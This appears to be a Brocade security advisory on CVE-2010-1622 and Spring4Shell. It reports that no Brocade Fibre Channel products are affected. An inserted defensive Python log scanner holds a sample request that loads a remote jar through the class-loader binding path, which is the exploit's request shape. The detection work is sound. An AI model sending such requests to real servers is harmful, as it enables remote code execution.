BSA-2022-1770

Brocade Fabric OS

21300

05 April 2022

05 April 2022

Closed

N/A

N/A

N/A

CVE-2010-1622

Summary

Security Advisory ID : BSA-2022-1770

Component : SpringSource Spring Framework

Revision : 1.0

CVE-2010-1622: SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

Brocade PSIRT has become aware of two remote code execution (RCE) vulnerabilities:

  • CVE-2022-22963, affecting Spring Cloud Function
  • CVE-2022-22965, known as “Spring4Shell,” affecting Spring Framework

According to VMware, the Spring4Shell vulnerability bypasses the patch for CVE-2010-1622, causing CVE-2010-1622 to become exploitable again. The bypass of the patch is possible because Java Development Kit (JDK) versions 9 and later provide two sandbox restriction methods, which opens a path to exploit CVE-2010-1622 (JDK versions before 9 provide only one sandbox restriction method).
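The request shape quoted in the CVE description above (a data-binding parameter name that walks through the class property) is something a defender can look for in web server access logs. The following is an added example, not part of the advisory: it applies a denylist in the spirit of Spring's disallowed-fields mitigation to constructed sample log lines and reports any request whose parameter names traverse a "class" or "Class" segment. The log lines, hostnames and paths are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (not taken from the advisory). Line 1
# carries the CVE-2010-1622 request shape, line 2 is a benign form post,
# line 3 reaches the class property through a nested, capitalised getter.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Apr/2022:10:00:01 +0000] "GET /app/form?class.classLoader.URLs[0]=jar:http://example.invalid/x.jar!/ HTTP/1.1" 200 512
10.0.0.6 - - [05/Apr/2022:10:00:02 +0000] "POST /app/form?name=alice&email=a%40example.invalid HTTP/1.1" 200 77
10.0.0.7 - - [05/Apr/2022:10:00:03 +0000] "GET /app/form?user.Class.classLoader.x=1 HTTP/1.1" 400 0
"""

# Any binding path that contains a whole segment named "class"/"Class" is
# flagged, regardless of what follows it; "classic" or "myclass" do not match.
DENIED_SEGMENT = re.compile(r"(^|\.)[cC]lass(\.|\[|$)")

# Pulls the method and request target out of a common-log-format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target: str) -> list:
    """Return the query parameter names in `target` that traverse a class segment."""
    if "?" not in target:
        return []
    query = target.split("?", 1)[1]
    # parse_qsl percent-decodes names and values for us.
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if DENIED_SEGMENT.search(name)]


def scan_log(text: str) -> list:
    """Return (line_number, method, offending parameter names) for each flagged line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append((lineno, m.group("method"), hits))
    return findings


if __name__ == "__main__":
    for lineno, method, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {method} request binds {hits}")
```

Only the query string is inspected here; POST bodies are not in access logs, so the same check belongs at the application layer as well.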

More information is available at:
Brocade has investigated its product line to determine the exposure of Brocade Fibre Channel products from Broadcom.

Affected Products

No Brocade Fibre Channel products from Broadcom are currently known to be affected by CVE-2010-1622.

Revision History

Version   Change                Date
1.0       Initial Publication   April 4th, 2022